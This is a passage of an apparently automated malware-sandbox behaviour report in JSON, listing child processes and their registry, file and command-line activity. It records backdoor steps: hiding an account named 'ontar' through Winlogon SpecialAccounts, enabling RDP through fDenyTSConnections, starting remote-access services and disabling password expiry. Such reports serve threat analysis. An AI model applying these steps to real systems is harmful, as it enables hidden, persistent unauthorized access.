"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\Service\\PolicyRefreshInProgress",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DiscoveryManager\\DiscoveryProviderDllPath",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\LDAP\\UseHostnameAsAlias",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Component Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SystemSetupInProgress",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.44.3.4!7\\Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft RSA SChannel Cryptographic Provider\\Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\Service\\Enable",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Component Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Setup\\SourcePath",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Base Smart Card Crypto Provider\\Type",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-4",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-2",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-3",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-1",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Validator Clsid",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\MaxPendingOffers",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\LDAP\\UseOldHostResolutionOrder",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Config Clsid",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Version",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Enabled",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Description",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\Tracing Level",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\UserenvDebugLevel",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\Roaming\\RefreshDllName",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\DoNotUseSSL",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Version",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DownloadManager\\TransportDllPath",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Version",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\MaxSimultaneousUploads",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Registration Date",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7\\Name",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Friendly Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Base Cryptographic Provider v1.0\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Validator Clsid",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Rpc\\Extensions\\RemoteRpcDll",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\ServerRole",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\crypt32\\DebugHeapFlags",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\System\\GpSvcDebugLevel",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\MaxSimultaneousDownloads",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Vendor Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\SecurityManager\\BlockSize",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Base DSS Cryptographic Provider\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Component Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Vendor Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Base DSS and Diffie-Hellman Cryptographic Provider\\Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Rpc\\SecurityService\\DefaultAuthLevel",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Vendor Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DiscoveryManager\\RepubQuorumSize",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\CurrentBuildNumber",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\TransportDllPath",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft DH SChannel Cryptographic Provider\\Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SQMClient\\Windows\\DisabledSessions\\MachineThrottling",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\MaxPendingDownloads",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Enabled",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\LDAP\\LdapClientIntegrity",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DiscoveryManager\\MinBackoffWindow",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Registration Date",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\SecurityManager\\NumBlocksPerSegment",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Enabled",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Component Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Info Clsid",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Strong Cryptographic Provider\\Type",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-101",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Description",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Config Clsid",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DownloadManager\\CryptoAlgo",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Enabled",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\IPHLPSVC\\config\\Connectivity_Platform_Enabled",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\ClientAuth",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Config Clsid",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-101",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-100",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-103",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-102",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Config Clsid",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\p2pcollab.dll,-8042",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Enhanced Cryptographic Provider v1.0\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Info Clsid",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Info Clsid",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Vendor Name",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Info Clsid",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\Enable Tracing",
"HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\Upgrade",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Friendly Name",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Registration Date",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\dnsapi.dll,-103",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Friendly Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\SecurityManager\\Restricted\\Seed",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-101",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-100",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-103",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-102",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\DevicePath",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\Interface\\{00000134-0000-0000-C000-000000000046}\\ProxyStubClsid32\\(Default)",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Friendly Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\Roaming\\ForceRoamingDetect",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Description",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Description",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SQMClient\\Windows\\DisabledProcesses\\F6C4EC9A",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Version",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SQMClient\\Windows\\DisabledSessions\\GlobalSession",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SQMClient\\Windows\\CEIPEnable",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-103",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-102",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Validator Clsid",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-100",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Validator Clsid",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Registration Date",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\Roaming\\RefreshProcName",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\Enabled",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.47.1.1!7\\Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Enhanced RSA and AES Cryptographic Provider\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TCPIP6\\Parameters\\DisabledComponents",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\PlumbIpsecPolicy"
]
},
"first_seen": 1574704403.218626,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 3932,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPO-List\\0"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPO-List\\0\\Version",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPO-List\\0\\Version"
]
},
"first_seen": 1574704405.015501,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 864,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_LOCAL_MACHINE\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\ontar",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\ontar"
]
},
"first_seen": 1574704392.015501,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\net.exe",
"process_name": "net.exe",
"pid": 3940,
"summary": {
"command_line": [
"C:\\Windows\\system32\\net1 start rasman"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language\\InstallLanguageFallback",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Locale\\00000409",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language Groups\\1",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\PreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\AlternateCodePage",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\MuiCached\\MachinePreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\EMPTY",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
]
},
"first_seen": 1574704394.921751,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 3948,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_LOCAL_MACHINE\\system\\CurrentControlSet\\Control\\Terminal Server"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\fDenyTSConnections",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\fDenyTSConnections"
]
},
"first_seen": 1574704401.374876,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 3956,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_LOCAL_MACHINE\\system\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\MaxConnectionTime",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\MaxConnectionTime"
]
},
"first_seen": 1574704401.562374,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\net.exe",
"process_name": "net.exe",
"pid": 3448,
"summary": {
"command_line": [
"C:\\Windows\\system32\\net1 start remoteaccess"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language\\InstallLanguageFallback",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Locale\\00000409",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language Groups\\1",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\PreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\AlternateCodePage",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\MuiCached\\MachinePreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\EMPTY",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
]
},
"first_seen": 1574704397.359249,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\sc.exe",
"process_name": "sc.exe",
"pid": 3968,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\sc.exe.mui"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language\\InstallLanguageFallback",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\PreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\AlternateCodePage",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\MuiCached\\MachinePreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\EMPTY"
]
},
"first_seen": 1574704400.187374,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\net.exe",
"process_name": "net.exe",
"pid": 3460,
"summary": {
"command_line": [
"C:\\Windows\\system32\\net1 accounts \/maxpwage:unlimited"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language\\InstallLanguageFallback",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Locale\\00000409",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language Groups\\1",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\PreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\AlternateCodePage",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\MuiCached\\MachinePreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\EMPTY",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
]
},
"first_seen": 1574704393.218626,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\attrib.exe",
"process_name": "attrib.exe",
"pid": 2440,
"summary": {
"file_opened": [
"C:\\Windows\\System32\\en-US\\ulib.dll.mui"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles"
],
"directory_enumerated": [
"C:\\Documents and settings",
"C:\\Documents and settings\\ontar",
"C:\\Documents and settings\\*.*"
]
},
"first_seen": 1574704404.296751,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\wbem\\WMIC.exe",
"process_name": "WMIC.exe",
"pid": 2796,
"summary": {
"dll_loaded": [
"urlmon.dll",
"wininet.dll",
"OLEAUT32.dll",
"C:\\Windows\\system32\\kernel32.dll",
"C:\\Windows\\system32\\wbem\\xml\\wmi2xml.dll",
"C:\\Windows\\system32\\uxtheme.dll"
],
"file_opened": [
"C:\\Windows\\System32\\wbem\\XSL-Mappings.xml",
"C:\\Windows\\System32\\wbem\\textvaluelist.xsl"
],
"regkey_opened": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Internet Explorer\\MAIN\\FeatureControl\\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562",
"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl",
"HKEY_CURRENT_USER\\Interface\\{423EC01E-2E35-11D2-B604-00104B703EFD}",
"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\PROTOCOLS\\Filter\\text\/xml",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Wbem\\CIMOM",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings",
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\crypt32",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\Interface\\{423EC01E-2E35-11D2-B604-00104B703EFD}\\ProxyStubClsid32",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\WBEM\\TextSource\\1",
"HKEY_CLASSES_ROOT\\PROTOCOLS\\Name-Space Handler\\*\\",
"HKEY_CLASSES_ROOT\\.xml",
